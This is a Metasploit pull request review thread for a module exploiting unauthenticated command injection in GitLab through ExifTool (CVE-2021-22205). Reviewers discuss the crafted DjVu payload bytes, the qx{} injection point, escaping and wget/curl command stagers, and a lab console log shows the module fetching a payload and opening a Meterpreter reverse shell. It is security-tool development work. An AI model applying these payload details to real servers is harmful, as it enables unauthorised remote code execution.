GitLab Unauth Command Injection via ExifTool (CVE-2021-22205)
rapid7/metasploit-framework pull request #15816
Opened 2021-11-02 09:10 UTC by jbaines-r7

## Description

This module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The vulnerability comes about because GitLab allows unauthenticated remote users to upload image files and passes them to ExifTool to strip away metadata. ExifTool was vulnerable to command injection via crafted DjVu files (see CVE-2021-22204), so a remote attacker was able to upload a malicious DjVu file to execute commands as the `git` user. GitLab assigned this CVE-2021-22205.

The patched versions of GitLab CE/EE are 13.10.3, 13.9.6, and 13.8.8. GitLab bundles ExifTool as part of it's install, so it's not possible to update it independently. 

## Verification

List the steps needed to make sure this thing works

- [ ]  Follow the install instructions for GitLab 13.10.2 provided in the exploit's documentation
- [ ]  Start `msfconsole`
- [ ]  `use exploit/multi/http/gitlab_exif_rce`
- [ ]  `set RHOST <ip>`
- [ ]  `check`
- [ ]  **Verify** the remote target is flagged as vulnerable
- [ ]  `set LHOST <ip>`
- [ ]  `set LPORT <port>`
- [ ]  `exploit`
- [ ] **Verify** you get a Meterpreter session.

## PCAP or It Didn't Happen

The following pcap demonstrates exploitation using the "Unix Command" target.

[gitlab_rce_reverse_shell.zip](https://github.com/rapid7/metasploit-framework/files/7459295/gitlab_rce_reverse_shell.zip)

2021-11-02 15:04 UTC, adfoster-r7 commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.rb
> +## Vulnerable Application
Our linter should've detected this, but looks like this is a `.rb` file instead of `.md` 😄

2021-11-02 15:15 UTC, bcoles commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = Base64.decode64('fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
Why not define this as a string?

```suggestion
    payload_trailer = '} . \." b ") )' + ' ' * 400 # 400 is an estimate - I didn't count them.
```

2021-11-02 15:15 UTC, bcoles commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    end
The HTTP response code might be useful? Also, redundant `else` after `fail_with`.

2021-11-02 15:18 UTC, bcoles commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +This module exploits an unauthenticated file upload and command injection vulenrability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.
```suggestion
This module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8.
```

2021-11-02 15:18 UTC, bcoles commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +Exploitation will results in code execution as the git user.
```suggestion
Exploitation will result in command execution as the git user.
```

2021-11-02 15:18 UTC, bcoles commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +          injection vulenrability in GitLab Community Edition (CE) and
```suggestion
          injection vulnerability in GitLab Community Edition (CE) and
```

2021-11-02 15:18 UTC, bcoles commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +          Exploitation will results in code execution as the git user.
```suggestion
          Exploitation will result in command execution as the git user.
```

2021-11-02 15:19 UTC, bcoles commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    end
Actually... If the code comment above is to be believed, then a 422 HTTP response should be received during successful exploitation. Where as this conditional checks `if res` which will be true in the event that a 422 is received.

2021-11-02 15:38 UTC, wvu-r7 requested changes

2021-11-02 15:38 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +### Description
```suggestion
### Description

```

2021-11-02 15:38 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +
```suggestion
```

2021-11-02 15:38 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +### GitLab 13.10.1 on Ubuntu 20.04.2 x64. Get Metepreter session.
```suggestion
### GitLab 13.10.1 on Ubuntu 20.04.2 x64. Get Meterpreter session. 
```

2021-11-02 15:43 UTC, wvu-r7 commented
```
wvu@kharak:~/rapid7/metasploit-framework:HEAD$ tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/http/gitlab_exif_rce.md
documentation/modules/exploit/multi/http/gitlab_exif_rce.md - [INFO] Missing Section: ## Options
documentation/modules/exploit/multi/http/gitlab_exif_rce.md - [WARNING] Please add a newline at the end of the file
documentation/modules/exploit/multi/http/gitlab_exif_rce.md:4 - [WARNING] Line too long (204). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/gitlab_exif_rce.md:11 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/http/gitlab_exif_rce.md:13 - [WARNING] Line too long (148). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/gitlab_exif_rce.md:34 - [WARNING] Spaces at EOL
wvu@kharak:~/rapid7/metasploit-framework:HEAD$
```

2021-11-02 16:03 UTC, wvu-r7 requested changes

2021-11-02 16:03 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +              'CmdStagerFlavor' => ['wget'],
This isn't really limited to `wget`, right?

2021-11-02 16:17 UTC, wvu-r7 requested changes

2021-11-02 16:17 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    random_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12).to_s)
```suggestion
    random_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12))
```

`TARGETURI` needs to be registered as well.

2021-11-02 16:17 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +      'uri' => '/users/sign_in'
```suggestion
      'uri' => normalize_uri(target_uri.path, '/users/sign_in')
```

2021-11-02 16:17 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +      return Exploit::CheckCode::Safe('Not a GitLab web interface')
```suggestion
      return CheckCode::Safe('Not a GitLab web interface')
```

2021-11-02 16:17 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    res = upload_file('AAAAA')
Can this be randomized, and does this module need to clean up after itself?

2021-11-02 16:17 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +      return CheckCode::Detected('The target did not respond to the upload requests.')
```suggestion
      return CheckCode::Detected('The target did not respond to the upload request.')
```

2021-11-02 16:17 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    return Exploit::CheckCode::Detected
```suggestion
    Exploit::CheckCode::Detected
```

2021-11-02 16:52 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload = cmd
I would rename this variable to avoid shadowing the generated payload's.

2021-11-02 16:55 UTC, jbaines-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload = cmd
I'll just remove it and use `cmd` directly.

2021-11-02 17:03 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2021-11-02 18:30 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    res = upload_file('AAAAA')
For the record, @jbaines-r7 says files are cleaned up automatically. :+1:

2021-11-02 19:14 UTC, jbaines-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    res = upload_file('AAAAA')
Sorry! Flagged this as resolved because I randomized it and ignored the question 😬 

Yes, these get auto-cleaned up. GitLab writes them to `/opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp/` but has an auto-clean up mechanism that tracks / removes them as soon as the HTTP connection been terminated. Just as a kind of "proof", I ran `ls` on the directory just before, during, and after acquiring a meterpreter session and it looked like this:

```sh
root@ubuntu:/opt/gitlab# ls -l /opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp/
total 0
root@ubuntu:/opt/gitlab# ls -l /opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp/
total 0
-rw------- 1 git git 0 Nov  2 12:11 PclYcFeLzF7y.jpg396257088
root@ubuntu:/opt/gitlab# ls -l /opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp/
total 0
```

Because our payloads generate an error either via ExifTool or 404, we don't have to worry about them being copied elsewhere.

2021-11-02 19:35 UTC, jbaines-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +              'CmdStagerFlavor' => ['wget'],
I've expanded this to allow for `curl` and `lwprequest`.

I ruled out `bourne` because it exceeds the allowed line limit. I ruled out `echo` because ExifTool uses `/bin/sh`, which on Ubuntu is a symlink to `dash`. `dash` doesn't support any parameters with `echo` and the `echo` cmdstager relies on `-ne`.

Similarly, I ruled out `printf` due to `dash` limitations. `printf` would work if ExifTool didn't mess with null bytes, but oddly they need to be double escaped. For example:

```
printf '\0\1\2\3\4' >/tmp/lol
```
Causes ExifTool to error out and output the following error:

```
sh: 1: Syntax error: Unterminated quoted string
```

Whereas,

```
printf '\\0\1\2\3\4' >/tmp/lol
```

Works just fine. So in reality, I could make `printf` work, it would just take a little special filtering for `printf` strings. Which I can do if we think its valuable.

2021-11-02 19:58 UTC, wvu-r7 approved these changes

2021-11-02 21:58 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +          ],
You might want `BadChars` for this target.

2021-11-02 22:01 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
This can optionally be moved to a [template file](https://github.com/rapid7/metasploit-framework/tree/master/data/exploits) unless you want it to be self-contained to the module.

2021-11-02 22:17 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
```
2.7.2 :003 > puts payload_header.inspect
"AT&TFORM\x00\x00\x03\xAFDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99 !\xC8\x91N\xEB\f\a\x1F\xD2\xDA\x88\xE8k\xE6D\x0F,q\x02\xEEI\xD3n\x95\xBD\xA2\xC3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\b\x00\b\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0Fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\b\x00\b\x8A\xE6\xE1\xB17\xD9\x7F*\x89\x00BG44\x00\x00\x00\x04\x01\x0F\xF9\x9FBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\aDJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"
 => nil
2.7.2 :004 >
```

Maybe the exploit string can be pulled out for readability, at least.

2021-11-02 22:37 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
I've been meaning to ask: have you tried encoding the command in _Perl_?

2021-11-02 22:51 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
I've been meaning to ask: have you tried decoding an encoded command _in Perl_?

2021-11-02 23:13 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
I've been meaning to ask: have you tried decoding an encoded command _in Perl_? I guess that depends on where the size constraint is. :eyes:

2021-11-03 06:54 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +  include Msf::Exploit::CmdStager
```suggestion
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
```

This module might be suitable for `AutoCheck`, since files are cleaned up automatically.

2021-11-03 07:03 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    end
Target will reply with `422` if `MeterpreterTryToFork` is enabled.

2021-11-03 10:43 UTC, jbaines-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    end
Ugh. I wasn't aware of this parameter. I actually considered not forking desirable behavior. It meant we could distinguish between the three cases:

1. Exploit hit a non-vulnerable target (status 404)
2. Exploit landed on a vulnerable target but failed (status 422)
3. Exploit was successful (no response since the connection is being held open)

Like you said, when `set MeterpreterTryToFork true` the connection closes and we get the 422 immediately. I'll think about it.

2021-11-03 10:44 UTC, jbaines-r7 commented
Moved to draft while I address a couple of things @wvu-r7 pointed out.

2021-11-03 10:50 UTC, jbaines-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
My personal preference is to keep the module self-contained. I also thought the base64 look was cleaner, but I'm clearly the minority 😆 I'll remove the base64 encoding, and format for readability.

2021-11-03 12:41 UTC, smcintyre-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    end
If not forking is desirable, you can deregister the option so the user can't change it on you.

2021-11-03 16:04 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    end
FWIW, backgrounding in the `CmdStager` didn't work. 😛

2021-11-03 16:09 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +recommended to use a meterpreter payload with `printf` due to the time it will take to write the payload.
It's probably taking longer because you're using a stageless payload.

2021-11-03 16:20 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
Same, though Base64-encoded binary blobs can be placed in a [here document](https://ruby-doc.org/core-2.7.2/doc/syntax/literals_rdoc.html#label-Here+Documents+-28heredocs-29) for line-length readability.

2021-11-03 16:33 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
I think in this case, the binary blob is relatively short, and it's helpful to see where the exploit string itself is.

2021-11-03 16:36 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +                'BadChars' => ''
Is `}` a badchar?

2021-11-03 17:10 UTC, jbaines-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +                'BadChars' => ''
Technically, not. As long as it's escaped, it's fine. e.g.

`qx{echo vakzz} >/tmp/vakzz}`

Doesn't echo to /tmp/vakzz, but

`qx{echo vakzz\} >/tmp/vakzz}`

Does. Certainly, it requires special handling but _can_ appear in a payload. So, I'm not exactly sure if it needs to be in BadChars or not?

2021-11-03 17:13 UTC, jbaines-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +    payload_trailer = "} . \\\x0a\" b \") )" + (' ' * 421)
The most recent version just has it as a multi-line string. Which, I think, is okay. Certainly not pretty, but reasonably shows the reader what is going on.

2021-11-03 17:18 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +                'BadChars' => ''
Yes, it's a permitted character if it's escaped or encoded away. It's a badchar if you're not handling any of that yourself. Up to you.

2021-11-03 17:20 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +                'BadChars' => ''
You can change the delimiter, too, if you wish.

2021-11-03 17:24 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +                'BadChars' => ''
```
wvu@kharak:~$ perl -e 'print qx,whoami,'
wvu
wvu@kharak:~$
```

2021-11-03 17:34 UTC, jbaines-r7 commented on modules/exploits/multi/http/gitlab_exif_rce.rb
> +                'BadChars' => ''
That's a pretty good point. I can probably pretty safely switch to `#` as it's one of the few special characters that are pretty useless for our purposes, and therefore unlikely to appear.

2021-11-03 17:39 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +recommended to use a meterpreter payload with `printf` due to the time it will take to write the payload.
FWIW, it may be helpful to default to a staged payload for maximum `CmdStager` efficiency.

2021-11-03 17:52 UTC, wvu-r7 approved these changes

2021-11-03 20:54 UTC, smcintyre-r7 commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +#### GitLab 13.10.2 on Ubuntu 20.04.2 x64
Yup can confirm that the public docker image can be used for testing. This is what I ended up with and it was super simple:
```
docker run --rm \
   --publish 10443:443 --publish 10080:80 --publish 10022:22 --publish 10587:587 --publish 10025:25 \
   --name gitlab \
   gitlab/gitlab-ce:13.10.2-ce.0
```

Gitlab is then available on tcp/10080.

2021-11-03 20:57 UTC, smcintyre-r7 commented
I was able to test the check method and both exploit targets. Everything worked as expected on the first try. I used the public `gitlab/gitlab-ce:13.10.2-ce.0` image for testing. Notably the `wget` command stager worked.

```
msf6 exploit(multi/http/gitlab_exif_rce) > show options 

Module options (exploit/multi/http/gitlab_exif_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      10080            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gitlab_exif_rce) > check

[*] Uploading JjIKBUN.jpg to /OTah4CI9Gl
[+] 192.168.159.128:10080 - The target is vulnerable. The error response indicates ExifTool was executed.
msf6 exploit(multi/http/gitlab_exif_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Uploading 9MrySnchO.jpg to /gJ0ZtFtp0U1i
[+] The target is vulnerable. The error response indicates ExifTool was executed.
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/AcMnHRd
[*] Local IP: http://192.168.250.134:8080/AcMnHRd
[*] Uploading BiUqtG.jpg to /DX6Wm1B9k
[*] Client 192.168.159.128 (Wget/1.20.3 (linux-gnu)) requested /AcMnHRd
[*] Sending payload to 192.168.159.128 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (984904 bytes) to 192.168.159.128
[+] Exploit successfully executed.
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.128:32956 ) at 2021-11-03 16:57:00 -0400
[*] Server stopped.

meterpreter > getuid
Server username: git
meterpreter > sysinfo
Computer     : 10.0.2.100
OS           : Ubuntu 20.04 (Linux 5.14.14-200.fc34.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

I'll have this landed shortly.

2021-11-03 20:58 UTC, merged

2021-11-03 21:01 UTC, smcintyre-r7 commented
# Release Notes
This adds an exploit for an unauthenticated remote command injection in GitLab via a separate vulnerability within ExifTool. The vulnerabilities are identified as CVE-2021-22204 and CVE-2021-22205.

2021-11-03 21:09 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/gitlab_exif_rce.md
> +#### GitLab 13.10.2 on Ubuntu 20.04.2 x64
Docker ftw.